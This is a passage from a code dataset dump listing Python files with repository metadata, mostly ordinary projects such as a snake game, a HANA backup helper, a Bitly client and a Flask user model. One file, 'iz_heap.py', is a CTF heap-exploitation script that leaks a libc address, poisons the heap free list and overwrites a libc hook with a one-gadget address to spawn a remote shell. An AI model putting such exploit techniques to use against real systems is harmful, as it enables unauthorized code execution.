blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
06b5c58d9ad0cb17cf0ba76d39d551040997dd6d
|
e59b939d0cf51783fabf750034cc926cd1830ac7
|
/blender/nodes/output/__init__.py
|
db10ea1183e37c196fd7d1981634e73dc11d93cc
|
[
"MIT"
] |
permissive
|
taichi-dev/taichi_elements
|
cf96e66fd1207d5389709da0c6148e19c990db06
|
2451c9843a7058a1edcd10e448460f4ba509ecc4
|
refs/heads/master
| 2023-08-19T09:07:36.709483 | 2023-02-09T19:39:25 | 2023-02-09T19:39:25 | 231,448,642 | 400 | 71 |
MIT
| 2023-07-25T21:29:52 | 2020-01-02T19:46:31 |
Python
|
UTF-8
|
Python
| false | false | 20 |
py
|
from .mesh import *
|
[
"[email protected]"
] | |
289e97211637cfe7a0756c10320768fac5de8148
|
f72a0878225776c4c51d6201aeda705c99e197a4
|
/rna_transcription.py
|
bcfda4eba6b499420d1d3f1835135fcf076d0162
|
[] |
no_license
|
pnadolny13/exercism_python
|
f9dbb8ec0df809ef428a9c3141cc7a9539934698
|
26726fb8d1f732dae8b04e61bb6c99df00abbc2c
|
refs/heads/master
| 2021-01-19T20:50:35.160506 | 2017-09-21T16:07:46 | 2017-09-21T16:07:46 | 88,566,822 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 486 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 20 22:42:11 2017
@author: pnadolny
"""
def to_rna(dna):
dna = str.upper(dna);
rna = [];
for i in dna:
if i == "G":
rna.append("C");
elif i == "C":
rna.append("G");
elif i == "T":
rna.append("A");
elif i == "A":
rna.append("U");
else:
rna = [];
break;
rna = ''.join(rna);
return rna;
|
[
"[email protected]"
] | |
833cbc14fd0605506b60d0d63c541f6e3bccb68b
|
6641090f2715a19503139f9c0c2440d2059a58b4
|
/main.py
|
6a045a75813d49a80f20bb02a64696fb6e5c8c05
|
[] |
no_license
|
JakobJBauer/snake-game
|
85e06c4b52b043c8e5d08adc10aee033da03dce9
|
ffac318a71a5088e9e41719db1a9206610235ad4
|
refs/heads/master
| 2021-05-27T10:32:30.594714 | 2020-04-11T06:42:29 | 2020-04-11T06:42:29 | 254,254,475 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,628 |
py
|
import pygame
import time
import random
from frame import Frame
from snake import Snake
from food import Food
# region define constants
FRAME_WIDTH = 500
FRAME_HEIGHT = 500
COLOR = 'red3'
FPS = 30
PIXEL_SIZE = 10
COMIC_SANS_MS_KEY = "Comic Sans MS"
# endregion
pygame.init()
start = True
while start:
start = False
frame = Frame(FRAME_WIDTH, FRAME_HEIGHT, "Snake - by Jakob J. Bauer")
display = frame.get_display()
snake = Snake(frame, pygame.color.THECOLORS.get(COLOR, (255, 0, 0)), PIXEL_SIZE)
food = Food(PIXEL_SIZE, display, frame, pygame.color.THECOLORS[COLOR], snake)
clock = pygame.time.Clock()
loosing_text = pygame.font.SysFont(COMIC_SANS_MS_KEY, 30).render("You died!", False, (0, 255, 0))
revive_text = pygame.font.SysFont(COMIC_SANS_MS_KEY, 30).render("To restart, press Space.", False, (0, 255, 0))
food.get_eaten()
run = True
while run:
if snake.direction == "hold":
t0 = time.time()
if not snake.is_dead():
tn = time.time()
time_text = pygame.font.SysFont(COMIC_SANS_MS_KEY, 16).render(f"Time: {round(tn - t0, 1)}", False, (0, 255, 0))
score_text = pygame.font.SysFont(COMIC_SANS_MS_KEY, 16).render(f"Score: {snake.score}", False, (0, 255, 0))
clock.tick((FPS * ((tn - t0) * 0.01 + 0.8)) / 5)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT] and snake.direction != "right" and snake.direction != "hold":
snake.set_direction("left")
if keys[pygame.K_RIGHT] and snake.direction != "left":
snake.set_direction("right")
if keys[pygame.K_DOWN] and snake.direction != "up":
snake.set_direction("down")
if keys[pygame.K_UP] and snake.direction != "down":
snake.set_direction("up")
if keys[pygame.K_SPACE] and snake.is_dead():
snake.revive()
start = True
run = False
if snake.direction != "hold":
frame.window.fill((0, 0, 0))
snake.move()
eaten = food.eating_process()
if eaten:
food.set_food_color((random.randint(0, 222), random.randint(0, 222), random.randint(0, 222)))
snake.draw()
food.redraw()
display.blit(time_text, (440, 10))
display.blit(score_text, (440, 26))
if snake.is_dead():
display.blit(loosing_text, (200, 200))
display.blit(revive_text, (200, 300))
pygame.display.update()
pygame.quit()
|
[
"[email protected]"
] | |
e9d996c78e8dc4c50310a0589b6b1b7b6d6ebe3e
|
d58ead50a17e0dc4fd8aa737c7ea02c6566b488a
|
/gostuff/chapter_7_sgf/test_model.py
|
10ca30cd0095069e116daa52de070cb9a5df6595
|
[] |
no_license
|
ThaddKara/GoStuff3
|
571ae5c71fcd812625659904381a76b8e28fd117
|
def71eba0e312b06fa9244994d9a8929c2c33a1a
|
refs/heads/master
| 2020-09-06T03:10:51.351595 | 2019-11-14T19:03:31 | 2019-11-14T19:03:31 | 220,299,930 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,752 |
py
|
from dlgo.data.parallel_processor import GoDataProcessor
from dlgo.encoders.oneplane import OnePlaneEncoder
from dlgo.networks import small
from keras.models import Sequential
from keras.layers.core import Dense
from keras.callbacks import ModelCheckpoint
if __name__ == '__main__':
go_board_rows, go_board_cols = 19, 19
num_classes = go_board_rows * go_board_cols
num_games = 100
encoder = OnePlaneEncoder((go_board_rows, go_board_cols))
processor = GoDataProcessor(encoder=encoder.name())
generator = processor.load_go_data('train', num_games, use_generator=True)
test_generator = processor.load_go_data('test', num_games, use_generator=True)
input_shape = (encoder.num_planes, go_board_rows, go_board_cols)
network_layers = small.layers(input_shape)
model = Sequential()
for layer in network_layers:
model.add(layer)
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='adagrad',
metrics=['accuracy'])
epochs = 5
batch_size = 128
model.fit_generator(
generator=generator.generate(batch_size, num_classes),
epochs=epochs,
steps_per_epoch=(generator.get_num_samples() / batch_size),
validation_data=test_generator.generate(batch_size, num_classes),
validation_steps=test_generator.get_num_samples() / batch_size,
callbacks=[ModelCheckpoint('../checkpoints/small_model_epoch_{epoch}.h5')])
score = model.evaluate_generator(
generator=test_generator.generate(batch_size, num_classes),
steps=test_generator.get_num_samples() / batch_size)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
|
[
"[email protected]"
] | |
61ff05ae1f2ff962b13358a66b366ac5c612e540
|
46355d9f1155bc7c0c2480a7c53fcb71e3347569
|
/data_norm.py
|
5c3742f459e029c09162241225c57701dfd55b7a
|
[] |
no_license
|
digitaltxtlab/filterbubble_fb
|
f28c2d7ba53668ba4452d595772d254443f0d4fd
|
44005f5639b2924de00e28d043f4017470f537f6
|
refs/heads/master
| 2021-06-16T06:27:15.065368 | 2017-05-23T16:27:09 | 2017-05-23T16:27:09 | 80,649,535 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,506 |
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
normalization of data from data_import
"""
__author__ = 'KLN'
import os, re
from unidecode import unidecode
from nltk.stem.snowball import SnowballStemmer
def normstatus(df, stem = 1):
""" Danish language normalization for status updates from data_import.get_status"""
if stem == 1:
stemmer = SnowballStemmer('danish', ignore_stopwords = True)
pat = re.compile('\W+')
for i in range(len(df)):
s = df.loc[i,'content']
s = s.lower()
if stem == 1:
tokens = s.split()
tokens = [stemmer.stem(token) for token in tokens]
s = ' '.join(tokens)
s = unidecode(s)
s = pat.sub(' ',s)
df.loc[i,'content'] = s
return df
"""
## main
os.chdir(os.path.expanduser("~/Documents/proj/bechmann/filterbubble_fb"))
import data_import as di
filepath = os.path.expanduser('~/Documents/proj/bechmann/data/sample/')
df_list, ids = di.folder_import(filepath)
df_status = di.get_status(df_list, ids)
df_status_norm = normstatus(df_status)
df_photo = get_photo(df_list,ids)
# grap numeric id between fbid= and &set in: fbid=10202510181169383&set
import re
l = []
for i in range(len(df_photo)):
s = df_photo.loc[i,'image_id']
fbid = re.findall ('fbid=(.*?)\&set', s)# normal facebook (picture) id
if not fbid:
fbid = re.findall('www.facebook.com\/(.*?)\/photos',s) # alternate id
l.append(fbid)
#l
#s = df_photo.loc[5,'image_id']
#s
"""
|
[
"[email protected]"
] | |
616522b64c32d6f1f50b3960b866d5a6dac86f00
|
348f6801fdffb2a7706794d19f06738cf445e2ae
|
/Backup.py
|
6a97772fb21cf78773985c3ff0ce5b77f0ada3ce
|
[] |
no_license
|
darpan92/SAPHANABackupAutomation
|
c4c85bac690ae0ecdc0795bb0c5a1b0a6f6f0bd1
|
c15b64d744bb657cce84c757e5d99840bc90c7df
|
refs/heads/main
| 2023-05-05T06:06:50.286371 | 2021-05-24T14:59:08 | 2021-05-24T14:59:08 | 370,388,100 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,000 |
py
|
from hdbcli import dbapi
import sys
import shutil
import time
class Backup:
config = None
def __init__(self, config_instance):
self.config = config_instance
'''
Check the size of the backup
'''
def backup_size(self):
# Function backupsize() returns the estimated backup size of the database specified in the database parameter
conn = dbapi.connect(key= self.config.get_key() )
sql = "select sum(allocated_page_size) from M_CONVERTER_STATISTICS"
cursor = conn.cursor()
cursor.execute(sql)
size = [item for x in cursor for item in x]
y = ','.join( str(a) for a in size)
print(time.strftime("%Y-%m-%d-%H:%M:%S"), "Backup Size:", time.strftime("%Y-%m-%d-%H:%M:%S"))
return int(y)
'''
Check if disksize is large enough for backup
'''
def disk_size(self):
path = self.config.get_partition()
usage = shutil.disk_usage(path)
print(time.strftime("%Y-%m-%d-%H:%M:%S"), "Disk Size:", usage.free)
return usage.free
'''
Check to see if any other backups are running
'''
def backup_check(self):
# Function backup_check() checks to see if a backup of specified db is running
conn = dbapi.connect(key=self.config.get_key())
sql = "select BACKUP_ID from SYS.M_BACKUP_CATALOG where STATE_NAME = 'running';"
cursor = conn.cursor()
cursor.execute(sql)
backup_ids = [item for x in cursor for item in x]
print(time.strftime("%Y-%m-%d-%H:%M:%S"), "The following Backups were running:", backup_ids)
return backup_ids
'''
Function backupcancel() takes the result set from backupcheck() and cancels all backups running
The backupid and userstore key are used to cancel the backups and create a connection to the database respectively
A boolean True is returned if completed successfully
'''
def backup_cancel(self, backup_ids):
for ids in backup_ids:
conn = dbapi.connect(key= self.config.get_key())
sql ="BACKUP CANCEL " + str(ids) + ";"
cursor = conn.cursor()
backup = cursor.execute(sql)
print(time.strftime("%Y-%m-%d-%H:%M:%S"), "Backup was cancelled")
return backup
'''
Function fullbackup() takes a backup of the db that is specified in the self.configuration file under the parameter database
A boolean True is returned if completed successfully
'''
def full_backup(self):
conn = dbapi.connect(key= self.config.get_key())
sql ="BACKUP DATA USING FILE (" + "'" + str(self.config.get_backup_location()) + "'" + ", " + "\'" + self.config.get_backup_prefix() + "_" + time.strftime("%Y-%m-%d-%H:%M:%S") + "\'" + ")"
time.sleep(3)
cursor = conn.cursor()
print(sql)
backup = cursor.execute(sql)
print(time.strftime("%Y-%m-%d-%H:%M:%S"), "Backup was completed Successfully")
return backup
|
[
"[email protected]"
] | |
91858d79d83f7ba3165e67901f878bb4ebd5d2dd
|
a701db10bbdfe8f22b7a9d0672584f7af731e0ab
|
/url_shortener_service/clients/bitly_client.py
|
411cebe5aa2442531af2245ffd2f90e8908783e8
|
[] |
no_license
|
iamkhaya/url-shortener-service
|
b906d1d57b117735509b6e9ec18235cc99509393
|
d2d6512049905469277534be1b2259dd8b8fcbf2
|
refs/heads/master
| 2022-12-19T01:30:36.773708 | 2020-09-21T23:13:40 | 2020-09-21T23:13:40 | 297,461,166 | 2 | 0 | null | 2020-09-21T23:16:04 | 2020-09-21T21:05:41 |
Python
|
UTF-8
|
Python
| false | false | 2,346 |
py
|
import logging
from typing import List
import requests
from url_shortener_service.adapters.bitly_adapter import BitlyAdapter
from url_shortener_service.clients.abstract_client import AbstractClient
from url_shortener_service.dtos.short_url_dto import ShortUrlDto
from url_shortener_service.dtos.short_url_metric_dto import ShortUrlMetricDto
class BitlyClient(AbstractClient):
def __init__(self):
super().__init__()
self.logger = logging.getLogger(__name__)
self.requests_session = requests.session()
self.bitly_adapter = BitlyAdapter()
def shorten_url(self, long_url: str) -> ShortUrlDto:
"""
shorten a url using the bitly api
Args:
long_url: The long url to shorten
Returns:
short_url: A corresponding short url
"""
self.logger.info("shortening long url: %s", long_url)
bitly_shortening_url: str = "https://api-ssl.bitly.com/v4/bitlinks"
data: dict = {"long_url": long_url, "domain": self.bitly_settings["domain"]}
response = requests.post(bitly_shortening_url, headers=self.headers, json=data)
response.raise_for_status()
converted_response: ShortUrlDto = self.bitly_adapter.convert_get_bitlink_response(response.json())
self.logger.info("long url: %s, bitly response: %s", long_url, converted_response.__dict__)
return converted_response
def get_short_url_click_metrics(self, short_url: str) -> List[ShortUrlMetricDto]:
"""get click metrics for bitly defined short url
Args:
short_url: the url whose metrics is wanted
Returns:
link_clicks: a list of the clicks for the past 24 hours
"""
WINDOW_SIZE_IN_HOURS = 24 # probably want this to be part of the parameters
params = (
("unit", "hour"),
("units", WINDOW_SIZE_IN_HOURS),
("size", "5"),
)
url = "https://api-ssl.bitly.com/v4/bitlinks/" + short_url + "/clicks"
response = requests.get(url=url, headers=self.headers, params=params) # type: ignore
response.raise_for_status()
converted_response: List[ShortUrlMetricDto] = self.bitly_adapter.convert_get_bitlink_metrics_response(
response.json()
)
return converted_response
|
[
"[email protected]"
] | |
937f68177d0fecd5743188bb0990ceb0772ad8fa
|
212522b02391cfe1d7873747c21d5fabdfd5e35d
|
/app/models.py
|
ae71f7a4207600f0c9df6622b4970770e9039702
|
[] |
no_license
|
graydenshand/flask_app_template
|
9e5460875461f25d544f5575cf91b3d0dc5fa29d
|
12c9db046fd12fd88c92dc5ff13c76906199c4a4
|
refs/heads/master
| 2022-12-12T00:14:29.862095 | 2018-07-11T20:15:26 | 2018-07-11T20:15:26 | 140,622,018 | 1 | 0 | null | 2022-09-16T17:48:03 | 2018-07-11T19:56:35 |
Python
|
UTF-8
|
Python
| false | false | 1,595 |
py
|
from datetime import datetime
from hashlib import md5
from time import time
from flask import current_app
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
import jwt
from app import db, login
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
def __repr__(self):
return '<User {}>'.format(self.username)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def avatar(self, size):
digest = md5(self.email.lower().encode('utf-8')).hexdigest()
return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(
digest, size)
def get_reset_password_token(self, expires_in=600):
return jwt.encode(
{'reset_password': self.id, 'exp': time() + expires_in},
current_app.config['SECRET_KEY'],
algorithm='HS256').decode('utf-8')
@staticmethod
def verify_reset_password_token(token):
try:
id = jwt.decode(token, current_app.config['SECRET_KEY'],
algorithms=['HS256'])['reset_password']
except:
return
return User.query.get(id)
@login.user_loader
def load_user(id):
return User.query.get(int(id))
|
[
"[email protected]"
] | |
40e1fc945c26115dd87171bd13379d5ca5c0a6b4
|
cf5ea5fb21960be9d0dd8438a1f7712c7ec2ccdb
|
/Programming/Math/excelColumnNumber.py
|
0835bacd817ab4c91b94803df33604689fb3bfc1
|
[] |
no_license
|
anku255/Interviewbit
|
1010546199d626eddbdd30d6ba42d1c7e8a42d50
|
e42dfa10855b00934d39dcadce5fa527b4a96895
|
refs/heads/master
| 2020-06-28T20:27:44.774348 | 2019-09-20T17:17:01 | 2019-09-20T17:17:01 | 200,333,643 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 438 |
py
|
from __future__ import print_function
class Solution:
# returns 1 for A, 2 for B and so on
def getSingleColNum(self, col):
return ord(col) - 64
def titleToNumber(self, col):
columnNumber = 0
colList = list(col)
colList.reverse()
for position, char in enumerate(colList) :
columnNumber += 26**position * self.getSingleColNum(char)
print(columnNumber)
s = Solution()
s.findColumnNumber('AAA')
|
[
"[email protected]"
] | |
749ebd1fc73831af5d53749d304aa4f0729f1cf8
|
0ca0fc2c2aad412d9e2936d5d01fb1abc1539ee4
|
/apps/cart/forms.py
|
bead7dbbce173bcc6584e87b86d1c9a91dad31e7
|
[
"MIT"
] |
permissive
|
yeboahd24/python202
|
1f399426a1f46d72da041ab3d138c582c695462d
|
35963db9a4ad5fcd567ce1e98c673f1a2ed2abef
|
refs/heads/master
| 2023-05-06T04:14:19.336839 | 2021-06-02T01:22:44 | 2021-06-02T01:22:44 | 309,841,303 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 430 |
py
|
from django import forms
class CheckoutForm(forms.Form):
first_name = forms.CharField(max_length=255)
last_name = forms.CharField(max_length=255)
email = forms.EmailField(max_length=255)
phone = forms.CharField(max_length=255)
address = forms.CharField(max_length=255)
zipcode = forms.CharField(max_length=255)
place = forms.CharField(max_length=255)
stripe_token = forms.CharField(max_length=255)
|
[
"[email protected]"
] | |
ba9216a59c2b13e1304cc23a6f7ab5f03cb1bc79
|
4738be75b3c4f8b98bbf8c2ab970a32ac0bdc2bf
|
/home/snobots/unified-ros-platform/src/events/src/iros2019/inverse_kinematics.py
|
080a6b4038ae6be26128f4e692a271487bd9e02a
|
[
"BSD-2-Clause"
] |
permissive
|
chris-mega/PianoPlayer
|
eaf75a2b067d08284fe8abf0f4f664fde93e75a5
|
555268fbc9220817afb26de728024a3223e89f1f
|
refs/heads/master
| 2022-03-27T04:55:20.300585 | 2019-12-08T05:03:27 | 2019-12-08T05:03:27 | 213,043,747 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,177 |
py
|
#!/usr/bin/env python
# Author: Christian Melendez
# Inverse Kinematics program for a ROBOTIS-OP3 robot
from enum import Enum
from time import sleep
import rosnode
import rospy
from std_msgs.msg import String
from control_modules.control_module import ControlModule
from iros_vision.msg import ObjectCoords
from keys import Keys
import roslib.packages as rospkg
import os
import json
import math
from sensor_msgs.msg import JointState
from robotis_controller_msgs.msg import SyncWriteItem
from robotis_controller_msgs.srv import SetModule
class InverseKinematics(object):
joints = [
'r_sho_pitch',
'l_sho_pitch',
'r_sho_roll',
'l_sho_roll',
'r_el',
'l_el',
'r_hip_yaw',
'l_hip_yaw',
'r_hip_roll',
'l_hip_roll',
'r_hip_pitch',
'l_hip_pitch',
'r_knee',
'l_knee',
'r_ank_pitch',
'l_ank_pitch',
'r_ank_roll',
'l_ank_roll',
'head_pan',
'head_tilt'
]
def __init__(self):
self.sync_write_pub = rospy.Publisher(
'/robotis/sync_write_item', SyncWriteItem, queue_size=0)
self.dxl_torque_pub = rospy.Publisher(
'/robotis/dxl_torque', String, queue_size=0)
self.write_joint_pub = rospy.Publisher(
'robotis/set_joint_states', JointState, queue_size=0)
self.write_joint_pub2 = rospy.Publisher(
'robotis/direct_control/set_joint_states', JointState, queue_size=0)
self.read_joint_sub = rospy.Subscriber(
'/robotis/present_joint_states', JointState, self.get_joint_states)
self.set_joint_module_client = rospy.ServiceProxy(
'/robotis/set_present_ctrl_modules', SetModule)
vals = [0.0]*20
self.upper_arm = 89 # mm
self.forearm = 157 # mm
self.key_width = 20
self.joint_positions = dict(zip(InverseKinematics.joints, vals))
self.active_control = False
def get_joint_states(self, msg):
self.header = msg.header
for joint in range(len(msg.name)):
name = msg.name[joint]
position = msg.position[joint]
self.joint_positions[name] = position
def set_module(self, name):
if not self.active_control:
set_module_srv = SetModule()
set_module_srv.module_name = name
if not self.set_joint_module_client.call(set_module_srv.module_name):
rospy.logerr('Failed to set module')
self.active_control = True
def publish_joints(self):
self.set_module('direct_control_module')
msg = JointState()
msg.header = self.header
for joint in self.joint_positions:
name = joint
position = self.joint_positions[joint]
msg.name.append(name)
msg.position.append(position)
self.write_joint_pub2.publish(msg)
def publish_arms_only(self, arm):
self.set_module('direct_control_module')
msg = JointState()
msg.header = self.header
joint = '{}_sho_pitch'.format(arm)
msg.name.append(joint)
msg.position.append(self.joint_positions[joint])
joint = '{}_sho_roll'.format(arm)
msg.name.append(joint)
msg.position.append(self.joint_positions[joint])
joint = '{}_el'.format(arm)
msg.name.append(joint)
msg.position.append(self.joint_positions[joint])
self.write_joint_pub2.publish(msg)
def move_r_shoulder(self):
self.joint_positions['r_sho_pitch'] -= 0.017 # move arm down by 1 degree
self.publish_arms_only('r')
# self.publish_joints()
return self.joint_positions['r_sho_pitch']
def move_r_shoulder_roll_right(self):
self.joint_positions['r_sho_roll'] += 0.017 # move arm down by 1 degree
self.publish_arms_only('r')
# self.publish_joints()
return self.joint_positions['r_sho_roll']
def move_r_shoulder_roll_left(self):
self.joint_positions['r_sho_roll'] -= 0.017 # move arm down by 1 degree
self.publish_arms_only('r')
# self.publish_joints()
return self.joint_positions['r_sho_roll']
def move_arm(self, arm, values):
self.joint_positions['{}_sho_pitch'.format(arm)] = values[0]
self.joint_positions['{}_sho_roll'.format(arm)] = values[1]
self.joint_positions['{}_el'.format(arm)] = values[2]
# self.publish_joints()
self.publish_arms_only(arm)
def move_joint_to(self, joint, angle):
self.joint_positions[joint] = angle
self.publish_joints()
def get_arm_values(self):
left = [self.joint_positions['l_sho_pitch'], self.joint_positions['l_sho_roll'], self.joint_positions['l_el']]
right = [self.joint_positions['r_sho_pitch'], self.joint_positions['r_sho_roll'], self.joint_positions['r_el']]
return left, right
def calc_sho_roll(self, px, py):
d = (px/(px*px + py*py)**0.5)
return math.asin(d)
def equations(self, px, py, pz):
a1 = self.upper_arm
a2 = self.forearm
f1 = float(a2*a2 + a1*a1 - px*px - py*py - pz*pz)
f2 = float(2*a2*a1)
A = f1 / f2
# print('f1',f1, 'f2',f2, 'A',A)
# elbow = math.pi/2. - math.acos(A) # theta 6
elbow = -math.acos(A) # theta 6
# if elbow == -math.pi:
# elbow = 0
# elbow = 0
# sho_roll = math.asin(py/(a1 + a2*math.cos(elbow))) # theta 4
sho_roll = math.acos(py/(px*px + py*py + pz*pz)**0.5) # theta 4
B = -a2*math.sin(elbow)
C = -a1*math.cos(sho_roll) - a2*math.cos(sho_roll)*math.cos(elbow)
# sho_pitch = 2*math.atan((C + (B*B + C*C - px*px)**0.5) / (B + px)) # theta 2
sho_pitch = 0
if px != 0:
sho_pitch = math.atan(pz/px) - elbow # theta 2
else:
print('B C',B, C)
sho_pitch = 2*math.atan((C + (B*B + C*C - px*px)**0.5) / (B + px)) # theta 2
return sho_pitch, sho_roll, elbow
|
[
"[email protected]"
] | |
919c233e7bdb36d3f70e3650491f482e24733d42
|
5b4835aeda881f6784d7836801056d001023eff5
|
/2021/day-02/part2.py
|
14315142011e6bbbfd62dd9dbd63d1b0072ec4fc
|
[] |
no_license
|
xNaCly/advent-of-code
|
852cc53aef15b96aa537170e14cfa41bbf4078c5
|
3e02706bcd37bc2250e9580aa6418fc696e68338
|
refs/heads/master
| 2023-06-11T06:22:01.662727 | 2023-05-31T05:56:46 | 2023-05-31T05:56:46 | 317,822,846 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 321 |
py
|
n = "i.txt"
with open(n, "r") as f:
c = [x.strip() for x in f.readlines()]
h = 0
d = 0
a = 0
for l in c:
i,v = l.split(" ")
i = i[0]
v = int(v)
match i:
case "f":
h += v
d += a * v
case "d":
a += v
case "u":
a -= v
print(h*d)
|
[
"[email protected]"
] | |
490ef3f5be6348257d27d3d533195e69d91777d2
|
ebec5b460e0e5c901bd9bd155d341421be892a00
|
/linear_regression.py
|
431d39a487631ff0394013c562dd52577f1d3e7a
|
[] |
no_license
|
fredster9/thinkful-data-course
|
d0c9d746c4948da0ee8e936f20c3c9ef3c3fe11e
|
8aa4e9eaf4eecd04a8477284ce1e273dea344a5a
|
refs/heads/master
| 2021-01-22T22:21:21.439948 | 2015-06-06T19:38:15 | 2015-06-06T19:38:15 | 32,560,107 | 0 | 0 | null | 2015-04-14T03:10:13 | 2015-03-20T03:22:45 |
Python
|
UTF-8
|
Python
| false | false | 2,087 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 20:36:39 2015
@author: fred
"""
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
ld = pd.read_csv('https://spark-public.s3.amazonaws.com/dataanalysis/loansData.csv')
## Strip % signs from Interest.Rate
ld['Interest.Rate'] = ld['Interest.Rate'].map(lambda x: x.strip('%'))
ld['Interest.Rate'] = ld['Interest.Rate'].astype(float)
## Remove 'months' from Loan Length and convert to integer - from tutorial
cleanLoanLength = ld['Loan.Length'].map(lambda x: int(x.rstrip(' months')))
ld['Loan.Length'] = cleanLoanLength
## Process FICO score range to get low end into new col
# Add new column
ld['FICO.Score'] = pd.Series('', index=ld.index)
# Convert FICO.Range from object to str
print type(ld['FICO.Range'])
ld['FICO.Range'] = ld['FICO.Range'].map(lambda x: x.split('-'))
ld['FICO.Range'] = ld['FICO.Range'].astype(str)
ld['FICO.Score'] = ld['FICO.Range'].map(lambda x: int(x[2:5]))
plt.figure()
graph = ld['FICO.Score'].hist()
plt.show()
a = pd.scatter_matrix(ld, alpha = 0.5, figsize=(10,10), diagonal="hist")
## Doing the linear regression
intrate = ld['Interest.Rate']
loanamt = ld['Amount.Requested']
fico = ld['FICO.Score']
# Reshape column data returned as series
# The dependent variable
y = np.matrix(intrate).transpose()
# The independent variable reshaped as columns
x1 = np.matrix(fico).transpose()
x2 = np.matrix(loanamt).transpose()
# Put columns together to create input matrix w/ one col for each independent variable
x = np.column_stack([x1,x2])
# Create linear model
X = sm.add_constant(x) # add_constants appends col of ones to array if prepend == False
model = sm.OLS(y,X) # OLS = ordinary least squares model
f = model.fit() # fit the model
print 'F PARAMS', f.params[:] # prints everything
# Output the results
print 'Coefficients: ', f.params[1:3]
print 'Intercept: ', f.params[0]
print 'P-Values: ', f.pvalues
print 'R-Squared: ', f.rsquared
corr_table = ld.corr()
print corr_table
ld.to_csv('loansData_clean.csv', header=True, index=False)
|
[
"[email protected]"
] | |
ed6dc456eab11ab5052cb302c87cfbb2ebce405a
|
e53009b7543a6dff5019dd8f21c9e7488d9daf72
|
/2019/ISITDTU Quals/iz_heap.py
|
3ec97d74aafa5b1c64c985d868e9f9bc378e27a5
|
[] |
no_license
|
hOwD4yS/CTF
|
ca8546cd0715ce4a3c2ebe5bf3939cc19932d38f
|
0ff3de58513cbeb602a475f6add97b51c5574e28
|
refs/heads/master
| 2021-06-06T18:14:00.884142 | 2021-05-06T08:33:00 | 2021-05-06T08:33:00 | 144,465,413 | 9 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,144 |
py
|
from pwn import *
#p = process("./iz_heap_lv1")
p = remote("165.22.110.249",3333)
def add(size , data):
p.sendlineafter(":","1")
p.sendlineafter(":",str(size))
p.sendafter(":",data)
def edit(idx , size , data):
p.sendlineafter(":","2")
p.sendlineafter(":",str(idx))
p.sendlineafter(":",str(size))
p.sendafter(":",data)
def delete(idx):
p.sendlineafter(":","3")
p.sendlineafter(":",str(idx))
def editname(name):
p.sendlineafter(":","4")
p.sendlineafter(":","Y")
p.sendafter(":",name)
p.sendafter(":",p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x91)+"A"*0x80+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
for i in range(7):
print i
add(0x7f,"A")
for i in range(7):
print i
delete(i)
delete(20)
editname("A"*0x20)
libcbase = u64(p.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x3ebca0
print hex(libcbase)
editname(p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x71)+"A"*0x60+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
delete(20)
editname(p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x71)+p64(libcbase+0x3ed8e8)+"A"*(0x60-8)+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
add(0x68,"A")
add(0x68,p64(libcbase+0x4f322))
p.interactive()
|
[
"[email protected]"
] | |
5c4708a3dc80cafe963aa64187ed32d51dfc890f
|
40f9febe33ab1b2aaf8e7b9a965dc4966476ab52
|
/models/vision/detection/awsdet/utils/runner/hooks/logger/__init__.py
|
2ace40536b0692bc9f7c12b192f427ae1b06c7ac
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
permissive
|
johnbensnyder/deep-learning-models
|
770a9257eadb8f1b5bc250f277a45ac8c0eba2e7
|
5b1194a862c026a30d5dfff46979cb7e80869e81
|
refs/heads/master
| 2022-11-28T11:51:20.326742 | 2020-08-07T22:36:46 | 2020-08-07T22:36:46 | 262,207,411 | 0 | 1 |
Apache-2.0
